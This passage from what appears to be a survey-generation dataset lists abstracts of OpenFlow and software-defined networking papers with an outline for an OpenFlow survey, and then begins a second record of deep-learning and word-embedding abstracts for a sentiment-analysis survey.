This scheme operates three different cases in the domain, where the domain server share information with core router and edge router interactively. Moreover, we use the OpenFlow to control atomic behaviors for packet handing within each switching element, which could manipulate such behaviors from a control server, thus users can program their own network behaviors by injecting their own control programs into the server. The congestion control algorithm is simulated to ensure the convergence of the average rate and throughout capacity to its equilibrium state when there are many high-rate flows in multilayer network. Finally, we compared its performance of the dropping probability and the queue length with respect to the single router control results. --- paper_title: Virtual routers as a service: the RouteFlow approach leveraging software-defined networks paper_content: The networking equipment market is being transformed by the need for greater openness and flexibility, not only for research purposes but also for in-house innovation by the equipment owners. In contrast to networking gear following the model of computer mainframes, where closed software runs on proprietary hardware, the software-defined networking approach effectively decouples the data from the control plane via an open API (i.e., OpenFlow protocol) that allows the (remote) control of packet forwarding engines. Motivated by this scenario, we propose RouteFlow, a commodity routing architecture that combines the line-rate performance of commercial hardware with the flexibility of open-source routing stacks (remotely) running on general purpose computers. The outcome is a novel point in the design space of commodity routing solutions with far-reaching implications towards virtual routers and IP networks as a service. This paper documents the progress achieved in the design and prototype implementation of our work and outlines our research agenda that calls for a community-driven approach. --- paper_title: QuagFlow: partnering Quagga with OpenFlow paper_content: Computing history has shown that open, multi-layer hardware and software stacks encourage innovation and bring costs down. Only recently this trend is meeting the networking world with the availability of entire open source networking stacks being closer than ever. Towards this goal, we are working on QuagFlow, a transparent interplay between the popular Quagga open source routing suite and the low level vendor-independent OpenFlow interface. QuagFlow is a distributed system implemented as a NOX controller application and a series of slave daemons running along the virtual machines hosting the Quagga routing instances. --- paper_title: Scalable video streaming over OpenFlow networks: An optimization framework for QoS routing paper_content: OpenFlow is a clean-slate Future Internet architecture that decouples control and forwarding layers of routing, which has recently started being deployed throughout the world for research purposes. This paper presents an optimization framework for the OpenFlow controller in order to provide QoS support for scalable video streaming over an OpenFlow network. We pose and solve two optimization problems, where we route the base layer of SVC encoded video as a lossless-QoS flow, while the enhancement layers can be routed either as a lossy-QoS flow or as a best effort flow, respectively.
The proposed approach differs from current QoS architectures since we provide dynamic rerouting capability possibly using non-shortest paths for lossless and lossy QoS flows. We show that dynamic rerouting of QoS flows achieves significant improvement on the video's overall PSNR under network congestion. --- paper_title: Revisiting routing control platforms with the eyes and muscles of software-defined networking paper_content: Prior work on centralized Routing Control Platform (RCP) has shown many benefits in flexible routing, enhanced security, and ISP connectivity management tasks. In this paper, we discuss RCPs in the context of OpenFlow/SDN, describing potential use cases and identifying deployment challenges and advantages. We propose a controller-centric hybrid networking model and present the design of the RouteFlow Control Platform (RFCP) along the prototype implementation of an AS-wide abstract BGP routing service. --- paper_title: Towards software-friendly networks paper_content: There has usually been a clean separation between networks and the applications that use them. Applications send packets over a simple socket API; the network delivers them. However, there are many occasions when applications can benefit from more direct interaction with the network: to observe more of the current network state and to obtain more control over the network behavior. This paper explores some of the potential benefits of closer interaction between applications and the network. Exploiting the emergence of so-called "software-defined networks" (SDN) built above network-wide control planes, we explore how to build a more "software-friendly network". We present results from a preliminary exploration that aims to provide network services to applications via an explicit communication channel. --- paper_title: B4: experience with a globally-deployed software defined wan paper_content: We present the design, implementation, and evaluation of B4, a private WAN connecting Google's data centers across the planet. B4 has a number of unique characteristics: i) massive bandwidth requirements deployed to a modest number of sites, ii) elastic traffic demand that seeks to maximize average bandwidth, and iii) full control over the edge servers and network, which enables rate limiting and demand measurement at the edge. These characteristics led to a Software Defined Networking architecture using OpenFlow to control relatively simple switches built from merchant silicon. B4's centralized traffic engineering service drives links to near 100% utilization, while splitting application flows among multiple paths to balance capacity against application priority/demands. We describe experience with three years of B4 production deployment, lessons learned, and areas for future work. --- paper_title: Modeling and performance evaluation of an OpenFlow architecture paper_content: The OpenFlow concept of flow-based forwarding and separation of the control plane from the data plane provides a new flexibility in network innovation. While initially used solely in the research domain, OpenFlow is now finding its way into commercial applications. However, this creates new challenges, as questions of OpenFlow scalability and performance have not yet been answered. This paper is a first step towards that goal. 
Based on measurements of switching times of current OpenFlow hardware, we derive a basic model for the forwarding speed and blocking probability of an OpenFlow switch combined with an OpenFlow controller and validate it using a simulation. This model can be used to estimate the packet sojourn time and the probability of lost packets in such a system and can give hints to developers and researchers on questions how an OpenFlow architecture will perform given certain parameters. --- paper_title: Logically centralized?: state distribution trade-offs in software defined networks paper_content: Software Defined Networks (SDN) give network designers freedom to refactor the network control plane. One core benefit of SDN is that it enables the network control logic to be designed and operated on a global network view, as though it were a centralized application, rather than a distributed system - logically centralized. Regardless of this abstraction, control plane state and logic must inevitably be physically distributed to achieve responsiveness, reliability, and scalability goals. Consequently, we ask: "How does distributed SDN state impact the performance of a logically centralized control application?" Motivated by this question, we characterize the state exchange points in a distributed SDN control plane and identify two key state distribution trade-offs. We simulate these exchange points in the context of an existing SDN load balancer application. We evaluate the impact of inconsistent global network view on load balancer performance and compare different state management approaches. Our results suggest that SDN control state inconsistency significantly degrades performance of logically centralized control applications agnostic to the underlying state distribution. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Experimental validation and performance evaluation of OpenFlow-based wavelength path control in transparent optical networks. paper_content: OpenFlow, as an open-source protocol for network virtualization, is also widely regarded as a promising control plane technique for heterogeneous networks. But the utilization of the OpenFlow protocol to control a wavelength switched optical network has not been investigated. In this paper, for the first time, we experimentally present a proof-of-concept demonstration of OpenFlow-based wavelength path control for lightpath provisioning in transparent optical networks. 
We propose two different approaches (sequential and delayed approaches) for lightpath setup and two different approaches (active and passive approaches) for lightpath release by using the OpenFlow protocol. The overall feasibility of these approaches is experimentally validated and the network performances are quantitatively evaluated. More importantly, all the proposed methodologies are demonstrated and evaluated on a real transparent optical network testbed with both OpenFlow-based control plane and data plane, which allows their feasibility and effectiveness to be verified, and valuable insights of the proposed solutions to be obtained for deploying into real OpenFlow controlled optical networks. --- paper_title: OpenFlow Switching: Data Plane Performance paper_content: OpenFlow is an open standard that can be implemented in Ethernet switches, routers and wireless access points (AP). In the OpenFlow framework, packet forwarding (data plane) and routing decisions (control plane) run on different devices. OpenFlow switches are in charge of packet forwarding, whereas a controller set up switch forwarding table on a per-flow basis, to enable flow isolation and resource slicing. We focus on the data path and analyze the OpenFlow implementation in Linux based PCs. We compare OpenFlow switching, layer-2 Ethernet switching and layer-3 IP routing performance. Forwarding throughput and packet latency in underloaded and overloaded conditions are analyzed, with different traffic patterns. System scalability is analyzed using different forwarding table sizes, and fairness in resource distribution is measured. --- paper_title: Hey, you darned counters!: get off my ASIC! paper_content: Software-Defined Networking (SDN) gains much of its value through the use of central controllers with global views of dynamic network state. To support a global view, SDN protocols, such as OpenFlow, expose several counters for each flow-table rule. These counters must be maintained by the data plane, which is typically implemented in hardware as an ASIC. ASIC-based counters are inflexible, and cannot easily be modified to compute novel metrics. These counters do not need to be on the ASIC. If the ASIC data plane has a fast connection to a general-purpose CPU with cost-effective memory, we can replace traditional counters with a stream of rule-match records, transmit this stream to the CPU, and then process the stream in the CPU. These software-defined counters allow far more flexible processing of counter-related information, and can reduce the ASIC area and complexity needed to support counters. --- paper_title: HotSwap: correct and efficient controller upgrades for software-defined networks paper_content: Like any complex software, SDN programs must be updated periodically, whether to migrate to a new controller platform, repair bugs, or address performance issues. Nowadays, SDN operators typically perform such upgrades by stopping the old controller and starting the new one---an approach that wipes out all installed flow table entries and causes substantial disruption including losing packets, increasing latency, and even compromising correctness. This paper presents HotSwap, a system for upgrading SDN controllers in a disruption-free and correct manner. HotSwap is a hypervisor (sitting between the switches and the controller) that maintains a history of network events. 
To upgrade from an old controller to a new one, HotSwap bootstraps the new controller (by replaying the history) and monitors its output (to determine which parts of the network state may be reused with the new controller). To ensure good performance, HotSwap filters the history using queries specified by programmers. We describe our design and preliminary implementation of HotSwap, and present experimental results demonstrating its effectiveness for managing upgrades to third-party controller programs. --- paper_title: Kandoo: a framework for efficient and scalable offloading of control applications paper_content: Limiting the overhead of frequent events on the control plane is essential for realizing a scalable Software-Defined Network. One way of limiting this overhead is to process frequent events in the data plane. This requires modifying switches and comes at the cost of visibility in the control plane. Taking an alternative route, we propose Kandoo, a framework for preserving scalability without changing switches. Kandoo has two layers of controllers: (i) the bottom layer is a group of controllers with no interconnection, and no knowledge of the network-wide state, and (ii) the top layer is a logically centralized controller that maintains the network-wide state. Controllers at the bottom layer run only local control applications (i.e., applications that can function using the state of a single switch) near datapaths. These controllers handle most of the frequent events and effectively shield the top layer. Kandoo's design enables network operators to replicate local controllers on demand and relieve the load on the top layer, which is the only potential bottleneck in terms of scalability. Our evaluations show that a network controlled by Kandoo has an order of magnitude lower control channel consumption compared to normal OpenFlow networks. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Software defined networking: Meeting carrier grade requirements paper_content: Software Defined Networking is a networking paradigm which allows network operators to manage networking elements using software running on an external server. This is accomplished by a split in the architecture between the forwarding element and the control element. Two technologies which allow this split for packet networks are ForCES and Openflow. We present energy efficiency and resilience aspects of carrier grade networks which can be met by Openflow. We implement flow restoration and run extensive experiments in an emulated carrier grade network.
We show that Openflow can restore traffic quite fast, but its dependency on a centralized controller means that it will be hard to achieve 50 ms restoration in large networks serving many flows. In order to achieve 50 ms recovery, protection will be required in carrier grade networks. --- paper_title: On the Flexibility of MPLS Applications over an OpenFlow-Enabled Network paper_content: In today's networks, a node usually has a static role that cannot be easily changed without an expensive upgrade. In MPLS architecture, despite the flexible forwarding data plane not tied to a single forwarding technology, each MPLS node has to be dedicated for a specific role depending on its position in the edge or the core of the MPLS network domain. This paper proposes an approach to address the flexibility of an MPLS node to play multiple roles for different MPLS domains built on top of an underlying OpenFlow-enabled physical network. The pipelined approach through tables introduced in the version 1.1 and later of the OpenFlow specification allows the change of the packet processing behavior by just updating the memory structures -- such as the TCAM and hash tables. It exploits the power of the OpenFlow rules-based paradigm to demonstrate the high level programmability to achieve the deossification of an MPLS infrastructure. In order to validate our proposal, we have implemented our approach over a 100Gbps switch box built on network processors and tested it with three applications to evaluate its flexibility. The results show that the local software to hardware update of a Label Switched Path (LSP) can be made in 2.2ms, in average, and the deployment of a Label Switched Router (LSR) application with 400 labels takes only 392.5ms. --- paper_title: Source address validation solution with OpenFlow/NOX architecture paper_content: Current Internet is lack of validation on source IP address, resulting in many security threats. The future Internet can face the similar routing locator spoofing problem without careful design. The current in-progress source address validation standard, i.e., SAVI, is not of enough protection due to the solution space constraint. In this article, a mechanism named VAVE is proposed to improve the SAVI solutions. VAVE employs OpenFlow protocol, which provides the de facto standard network innovation interface, to solve source address validation problem with a global view. Significant improvements can be found from our evaluation results. --- paper_title: Unifying Packet and Circuit Switched Networks paper_content: There have been many attempts to unify the control and management of circuit and packet switched networks, but none have taken hold. In this paper we propose a simple way to unify both types of network using OpenFlow. The basic idea is that a simple flow abstraction fits well with both types of network, provides a common paradigm for control, and makes it easy to insert new functionality into the network. OpenFlow provides a common API to the underlying hardware, and allows all of the routing, control and management to be defined in software outside the datapath. --- paper_title: OMNI: OpenFlow MaNagement Infrastructure paper_content: Managing computer networks is challenging because of the numerous monitoring variables and the difficulty to autonomously configure network parameters. 
This paper presents the OpenFlow MaNagement Infrastructure (OMNI), which helps the administrator to control and manage OpenFlow networks by providing remote management based on a web interface. OMNI provides flow monitoring and dynamic flow configuration through a service-oriented architecture. OMNI also offers an Application Programming Interface (API) for collecting data and configuring the OpenFlow network. We propose a multi-agent system based on OMNI API that reduces packet loss rates. We evaluate both the OMNI management applications and the multi-agent system performance using a testbed. Our results show that the multi-agent system detects and reacts to a packet-loss condition in less than three monitoring intervals. --- paper_title: QuagFlow: partnering Quagga with OpenFlow paper_content: Computing history has shown that open, multi-layer hardware and software stacks encourage innovation and bring costs down. Only recently this trend is meeting the networking world with the availability of entire open source networking stacks being closer than ever. Towards this goal, we are working on QuagFlow, a transparent interplay between the popular Quagga open source routing suite and the low level vendor-independent OpenFlow interface. QuagFlow is a distributed system implemented as a NOX controller application and a series of slave daemons running along the virtual machines hosting the Quagga routing instances. --- paper_title: Ethane: taking control of the enterprise paper_content: This paper presents Ethane, a new network architecture for the enterprise. Ethane allows managers to define a single network-wide fine-grain policy, and then enforces it directly. Ethane couples extremely simple flow-based Ethernet switches with a centralized controller that manages the admittance and routing of flows. While radical, this design is backwards-compatible with existing hosts and switches. We have implemented Ethane in both hardware and software, supporting both wired and wireless hosts. Our operational Ethane network has supported over 300 hosts for the past four months in a large university network, and this deployment experience has significantly affected Ethane's design. --- paper_title: OpenFlow MPLS and the open source label switched router paper_content: Multiprotocol Label Switching (MPLS) [3] is a protocol widely used in commercial operator networks to forward packets by matching link-specific labels in the packet header to outgoing links rather than through standard IP longest prefix matching. However, in existing networks, MPLS is implemented by full IP routers, since the MPLS control plane protocols such as LDP [8] utilize IP routing to set up the label switched paths, even though the MPLS data plane does not require IP routing. OpenFlow 1.0 is an interface for controlling a routing or switching box by inserting flow specifications into the box's flow table [1]. While OpenFlow 1.0 does not support MPLS1, MPLS label-based forwarding seems conceptually a good match with OpenFlow's flow-based routing paradigm. In this paper we describe the design and implementation of an experimental extension of OpenFlow 1.0 to support MPLS. The extension allows an OpenFlow switch without IP routing capability to forward MPLS on the data plane. We also describe the implementation of a prototype open source MPLS label switched router, based on the NetFPGA hardware platform [4], utilizing OpenFlow MPLS. 
The prototype is capable of forwarding data plane packets at line speed without IP forwarding, though IP forwarding is still used on the control plane. We provide some performance measurements comparing the prototype to software routers. The measurements indicate that the prototype is an appropriate tool for achieving line speed forwarding in testbeds and other experimental networks where flexibility is a key attribute, as a substitute for software routers. --- paper_title: The controller placement problem paper_content: Network architectures such as Software-Defined Networks (SDNs) move the control logic off packet processing devices and onto external controllers. These network architectures with decoupled control planes open many unanswered questions regarding reliability, scalability, and performance when compared to more traditional purely distributed systems. This paper opens the investigation by focusing on two specific questions: given a topology, how many controllers are needed, and where should they go? To answer these questions, we examine fundamental limits to control plane propagation latency on an upcoming Internet2 production deployment, then expand our scope to over 100 publicly available WAN topologies. As expected, the answers depend on the topology. More surprisingly, one controller location is often sufficient to meet existing reaction-time requirements (though certainly not fault tolerance requirements). --- paper_title: Openflow-based server load balancing gone wild paper_content: Today's data centers host online services on multiple servers, with a front-end load balancer directing each client request to a particular replica. Dedicated load balancers are expensive and quickly become a single point of failure and congestion. The OpenFlow standard enables an alternative approach where the commodity network switches divide traffic over the server replicas, based on packet-handling rules installed by a separate controller. However, the simple approach of installing a separate rule for each client connection (or "microflow") leads to a huge number of rules in the switches and a heavy load on the controller. We argue that the controller should exploit switch support for wildcard rules for a more scalable solution that directs large aggregates of client traffic to server replicas. We present algorithms that compute concise wildcard rules that achieve a target distribution of the traffic, and automatically adjust to changes in load-balancing policies without disrupting existing connections. We implement these algorithms on top of the NOX OpenFlow controller, evaluate their effectiveness, and propose several avenues for further research. --- paper_title: Packet and circuit network convergence with OpenFlow paper_content: IP and Transport networks are controlled and operated independently today, leading to significant Capex and Opex inefficiencies for the providers. We discuss a unified approach with OpenFlow, and present a recent demonstration of a unified control plane for OpenFlow enabled IP/Ethernet and TDM switched networks. --- paper_title: Application-aware aggregation and traffic engineering in a converged packet-circuit network paper_content: We demonstrate a converged OpenFlow enabled packet-circuit network, where circuit flow properties (guaranteed bandwidth, low latency, low jitter, bandwidth-on-demand, fast recovery) provide differential treatment to dynamically aggregated packet flows for voice, video and web traffic.
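The server load-balancing entry above proposes replacing per-connection microflow rules with a handful of wildcard rules that split large aggregates of client traffic across replicas. A minimal sketch of that idea in Python, assuming a uniform split of the client source-address space into equal-sized prefixes (the rule format and the round-robin assignment are illustrative; the paper's algorithms compute non-uniform splits for a target distribution and adjust them without disrupting existing connections, which this sketch does not attempt):

# Toy wildcard-rule generator: cover the client source-IP space with 2**bits
# equal prefixes and spread them across replicas. Illustrative sketch only;
# not the NOX application described in the paper.
import ipaddress
from itertools import cycle

def wildcard_rules(replicas, bits=2, base="0.0.0.0/0"):
    """Yield (source_prefix, replica) pairs that together cover `base`."""
    targets = cycle(replicas)
    for prefix in ipaddress.ip_network(base).subnets(prefixlen_diff=bits):
        yield str(prefix), next(targets)

if __name__ == "__main__":
    for src, replica in wildcard_rules(["10.0.0.1", "10.0.0.2"], bits=2):
        # Each pair stands for one switch rule: match the source prefix,
        # rewrite the destination to the chosen replica, and forward.
        print(f"match nw_src={src:<12} -> replica {replica}")

With bits=2 and two replicas, each replica receives two /2 prefixes, i.e., half of the address space; increasing bits gives finer-grained but more numerous rules, which is the rule-count versus precision trade-off the entry alludes to.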
--- paper_title: MPLS with a simple OPEN control plane paper_content: We propose a new approach to MPLS that uses the standard MPLS data plane and an OpenFlow based simpler and extensible control plane. We demonstrate this approach using a prototype system for MPLS Traffic Engineering. --- paper_title: Towards software-friendly networks paper_content: There has usually been a clean separation between networks and the applications that use them. Applications send packets over a simple socket API; the network delivers them. However, there are many occasions when applications can benefit from more direct interaction with the network: to observe more of the current network state and to obtain more control over the network behavior. This paper explores some of the potential benefits of closer interaction between applications and the network. Exploiting the emergence of so-called "software-defined networks" (SDN) built above network-wide control planes, we explore how to build a more "software-friendly network". We present results from a preliminary exploration that aims to provide network services to applications via an explicit communication channel. --- paper_title: A network in a laptop: rapid prototyping for software-defined networks paper_content: Mininet is a system for rapidly prototyping large networks on the constrained resources of a single laptop. The lightweight approach of using OS-level virtualization features, including processes and network namespaces, allows it to scale to hundreds of nodes. Experiences with our initial implementation suggest that the ability to run, poke, and debug in real time represents a qualitative change in workflow. We share supporting case studies culled from over 100 users, at 18 institutions, who have developed Software-Defined Networks (SDN). Ultimately, we think the greatest value of Mininet will be supporting collaborative network research, by enabling self-contained SDN prototypes which anyone with a PC can download, run, evaluate, explore, tweak, and build upon. --- paper_title: Enabling the future optical Internet with OpenFlow: A paradigm shift in providing intelligent optical network services paper_content: This paper proposes an optical networking paradigm suitable for future Internet services enabled by OpenFlow. The OpenFlow technology supports the programmability of network functions and protocols by separating the data plane and the control plane, which are currently vertically integrated in routers and switches. OpenFlow facilitates fundamental changes in the behaviour of networks and their associated protocols. This paper introduces an OpenFlow optical network architecture enabled by optical flow, optical flow switching elements and programmable OpenFlow controllers. The proposed solution allows intelligent, user controlled and programmable optical network service provisioning with the capability to operate any user defined network protocol and scenario. --- paper_title: MPLS-TE and MPLS VPNS with openflow paper_content: We demonstrate MPLS Traffic Engineering (MPLS-TE) and MPLS-based Virtual Private Networks (MPLS VPNs) using OpenFlow [1] and NOX [6]. The demonstration is the outcome of an engineering experiment to answer the following questions: How hard is it to implement a complex control plane on top of a network controller such as NOX? Does the global vantage point in NOX make the implementation easier than the traditional method of implementing it on every switch, embedded in the data plane? 
We implemented every major feature of MPLS-TE and MPLS-VPN in just 2,000 lines of code, compared to much larger lines of code in the more traditional approach, such as Quagga-MPLS. Because NOX maintains a consistent, up-to-date topology map, the MPLS control plane features are quite simple to implement. And its simplicity makes it easy to extend: We have easily added several new features; something a network operator could do to customize their network to meet their customers' needs. The demo consists of two parts: MPLS-TE services and then MPLS VPN driven by a GUI. ---
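Two entries in the reference list above pose the controller placement problem: given a topology, how many controllers are needed and where should they go so that switch-to-controller latency stays acceptable. The following is a brute-force sketch of the average-latency variant on a small made-up graph (the node names, edge weights, and helper functions are illustrative assumptions; the cited study evaluates measured WAN topologies rather than toy graphs):

# Brute-force controller placement: choose the k nodes that minimize the mean
# shortest-path latency from every switch to its nearest controller.
# Illustrative sketch on an invented five-node topology.
from itertools import combinations

EDGES = [("a", "b", 2), ("b", "c", 3), ("c", "d", 2),
         ("d", "e", 4), ("e", "a", 5), ("b", "e", 1)]  # (node, node, latency ms)

def all_pairs_shortest(edges):
    """Floyd-Warshall over an undirected weighted edge list."""
    nodes = sorted({n for u, v, _ in edges for n in (u, v)})
    inf = float("inf")
    dist = {u: {v: (0 if u == v else inf) for v in nodes} for u in nodes}
    for u, v, w in edges:
        dist[u][v] = min(dist[u][v], w)
        dist[v][u] = min(dist[v][u], w)
    for k in nodes:
        for i in nodes:
            for j in nodes:
                if dist[i][k] + dist[k][j] < dist[i][j]:
                    dist[i][j] = dist[i][k] + dist[k][j]
    return nodes, dist

def best_placement(edges, k):
    """Return the k-controller set with the lowest average switch latency."""
    nodes, dist = all_pairs_shortest(edges)
    def mean_latency(ctrls):
        return sum(min(dist[s][c] for c in ctrls) for s in nodes) / len(nodes)
    return min(combinations(nodes, k), key=mean_latency)

if __name__ == "__main__":
    for k in (1, 2):
        print(f"best {k}-controller placement:", best_placement(EDGES, k))

Swapping mean_latency for a maximum over nodes gives the worst-case variant; on topologies of realistic size the same exhaustive search becomes expensive quickly, which is part of what makes the placement question non-trivial.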
Title: Network Innovation using OpenFlow: A Survey
Section 1: INTRODUCTION
Description 1: Introduce the concept of Software Defined Networking (SDN) and OpenFlow, articulating the motivations and outlining the objectives of the paper.
Section 2: BACKGROUND OF PROGRAMMABLE NETWORKS
Description 2: Present an overview of early approaches to programmable networks and the transition to SDN, highlighting softnet, Active Networks, and the ForCES standard.
Section 3: OPENFLOW SPECIFICATION
Description 3: Detail the technical specifications of different versions of OpenFlow, discussing the architecture, components, operations, and how applications can be implemented.
Section 4: CAPABILITIES OF OPENFLOW
Description 4: Discuss the inherent capabilities of OpenFlow networks, including centralized control, software-based traffic analysis, dynamic rule updating, and flow abstraction, with practical examples.
Section 5: OPENFLOW-BASED APPLICATIONS
Description 5: Survey various applications of OpenFlow in networking, focusing on ease of configuration, network management, security, availability, network virtualization, and wide area and wireless network applications.
Section 6: OPENFLOW DEPLOYMENTS
Description 6: Highlight different real-world deployments of OpenFlow in campus networks, research testbeds, and large-scale industry deployments, with specific examples such as the GENI infrastructure.
Section 7: PERFORMANCE OF OPENFLOW-BASED NETWORKS
Description 7: Review studies that have evaluated the performance of OpenFlow-based networks, including measurements, modeling, and suggestions for improving performance.
Section 8: CHALLENGES OF OPENFLOW-BASED NETWORKS
Description 8: Identify and discuss the various challenges faced by OpenFlow-based networks, such as security, availability, scalability, reliability, expenditure, and compatibility.
Section 9: CONCLUSIONS AND FUTURE DIRECTIONS
Description 9: Summarize the findings of the paper and propose future research directions in the study and application of OpenFlow-based networks.
Section 10: ACKNOWLEDGMENT
Description 10: Acknowledge the contributions of individuals and organizations that supported the research or provided feedback on the manuscript.
Deep Learning for Sentiment Analysis: A Survey
25
--- paper_title: Deep Sparse Rectifier Neural Networks paper_content: While logistic sigmoid neurons are more biologically plausible than hyperbolic tangent neurons, the latter work better for training multi-layer neural networks. This paper shows that rectifying neurons are an even better model of biological neurons and yield equal or better performance than hyperbolic tangent networks in spite of the hard non-linearity and non-differentiability --- paper_title: Sentiment Analysis: Mining Opinions, Sentiments, and Emotions paper_content: 1. Introduction 2. The problem of sentiment analysis 3. Document sentiment classification 4. Sentence subjectivity and sentiment classification 5. Aspect sentiment classification 6. Aspect and entity extraction 7. Sentiment lexicon generation 8. Analysis of comparative opinions 9. Opinion summarization and search 10. Analysis of debates and comments 11. Mining intentions 12. Detecting fake or deceptive opinions 13. Quality of reviews. --- paper_title: Representation Learning: A Review and New Perspectives paper_content: The success of machine learning algorithms generally depends on data representation, and we hypothesize that this is because different representations can entangle and hide more or less the different explanatory factors of variation behind the data. Although specific domain knowledge can be used to help design representations, learning with generic priors can also be used, and the quest for AI is motivating the design of more powerful representation-learning algorithms implementing such priors. This paper reviews recent work in the area of unsupervised feature learning and deep learning, covering advances in probabilistic models, autoencoders, manifold learning, and deep networks. This motivates longer term unanswered questions about the appropriate objectives for learning good representations, for computing representations (i.e., inference), and the geometrical connections between representation learning, density estimation, and manifold learning. --- paper_title: Convolutional deep belief networks for scalable unsupervised learning of hierarchical representations paper_content: There has been much interest in unsupervised learning of hierarchical generative models such as deep belief networks. Scaling such models to full-sized, high-dimensional images remains a difficult problem. To address this problem, we present the convolutional deep belief network, a hierarchical generative model which scales to realistic image sizes. This model is translation-invariant and supports efficient bottom-up and top-down probabilistic inference. Key to our approach is probabilistic max-pooling, a novel technique which shrinks the representations of higher layers in a probabilistically sound way. Our experiments show that the algorithm learns useful high-level visual features, such as object parts, from unlabeled images of objects and natural scenes. We demonstrate excellent performance on several visual recognition tasks and show that our model can perform hierarchical (bottom-up and top-down) inference over full-sized images. --- paper_title: Natural Language Processing (almost) from Scratch paper_content: We propose a unified neural network architecture and learning algorithm that can be applied to various natural language processing tasks including part-of-speech tagging, chunking, named entity recognition, and semantic role labeling.
This versatility is achieved by trying to avoid task-specific engineering and therefore disregarding a lot of prior knowledge. Instead of exploiting man-made input features carefully optimized for each task, our system learns internal representations on the basis of vast amounts of mostly unlabeled training data. This work is then used as a basis for building a freely available tagging system with good performance and minimal computational requirements. --- paper_title: Glove: Global Vectors for Word Representation paper_content: Recent methods for learning vector space representations of words have succeeded in capturing fine-grained semantic and syntactic regularities using vector arithmetic, but the origin of these regularities has remained opaque. We analyze and make explicit the model properties needed for such regularities to emerge in word vectors. The result is a new global logbilinear regression model that combines the advantages of the two major model families in the literature: global matrix factorization and local context window methods. Our model efficiently leverages statistical information by training only on the nonzero elements in a word-word cooccurrence matrix, rather than on the entire sparse matrix or on individual context windows in a large corpus. The model produces a vector space with meaningful substructure, as evidenced by its performance of 75% on a recent word analogy task. It also outperforms related models on similarity tasks and named entity recognition. --- paper_title: Improving Word Representations via Global Context and Multiple Word Prototypes paper_content: Unsupervised word representations are very useful in NLP tasks both as inputs to learning algorithms and as extra word features in NLP systems. However, most of these models are built with only local context and one representation per word. This is problematic because words are often polysemous and global context can also provide useful information for learning word meanings. We present a new neural network architecture which 1) learns word embeddings that better capture the semantics of words by incorporating both local and global document context, and 2) accounts for homonymy and polysemy by learning multiple embeddings per word. We introduce a new dataset with human judgments on pairs of words in sentential context, and evaluate our model on it, showing that our model outperforms competitive baselines and other neural language models. --- paper_title: A Neural Probabilistic Language Model paper_content: A goal of statistical language modeling is to learn the joint probability function of sequences of words in a language. This is intrinsically difficult because of the curse of dimensionality: a word sequence on which the model will be tested is likely to be different from all the word sequences seen during training. Traditional but very successful approaches based on n-grams obtain generalization by concatenating very short overlapping sequences seen in the training set. We propose to fight the curse of dimensionality by learning a distributed representation for words which allows each training sentence to inform the model about an exponential number of semantically neighboring sentences. The model learns simultaneously (1) a distributed representation for each word along with (2) the probability function for word sequences, expressed in terms of these representations. 
Generalization is obtained because a sequence of words that has never been seen before gets high probability if it is made of words that are similar (in the sense of having a nearby representation) to words forming an already seen sentence. Training such large models (with millions of parameters) within a reasonable time is itself a significant challenge. We report on experiments using neural networks for the probability function, showing on two text corpora that the proposed approach significantly improves on state-of-the-art n-gram models, and that the proposed approach allows to take advantage of longer contexts. --- paper_title: Distributed Representations of Words and Phrases and their Compositionality paper_content: The recently introduced continuous Skip-gram model is an efficient method for learning high-quality distributed vector representations that capture a large number of precise syntactic and semantic word relationships. In this paper we present several extensions that improve both the quality of the vectors and the training speed. By subsampling of the frequent words we obtain significant speedup and also learn more regular word representations. We also describe a simple alternative to the hierarchical softmax called negative sampling. ::: ::: An inherent limitation of word representations is their indifference to word order and their inability to represent idiomatic phrases. For example, the meanings of "Canada" and "Air" cannot be easily combined to obtain "Air Canada". Motivated by this example, we present a simple method for finding phrases in text, and show that learning good vector representations for millions of phrases is possible. --- paper_title: Learning word embeddings efficiently with noise-contrastive estimation paper_content: Continuous-valued word embeddings learned by neural language models have recently been shown to capture semantic and syntactic information about words very well, setting performance records on several word similarity tasks. The best results are obtained by learning high-dimensional embeddings from very large quantities of data, which makes scalability of the training method a critical factor. ::: ::: We propose a simple and scalable new approach to learning word embeddings based on training log-bilinear models with noise-contrastive estimation. Our approach is simpler, faster, and produces better results than the current state-of-the-art method. We achieve results comparable to the best ones reported, which were obtained on a cluster, using four times less data and more than an order of magnitude less computing time. We also investigate several model types and find that the embeddings learned by the simpler models perform at least as well as those learned by the more complex ones. --- paper_title: Hierarchical Probabilistic Neural Network Language Model paper_content: In recent years, variants of a neural network architecture for statistical language modeling have been proposed and successfully applied, e.g. in the language modeling component of speech recognizers. The main advantage of these architectures is that they learn an embedding for words (or other symbols) in a continuous space that helps to smooth the language model and provide good generalization even when the number of training examples is insufficient. However, these models are extremely slow in comparison to the more commonly used n-gram models, both for training and recognition. 
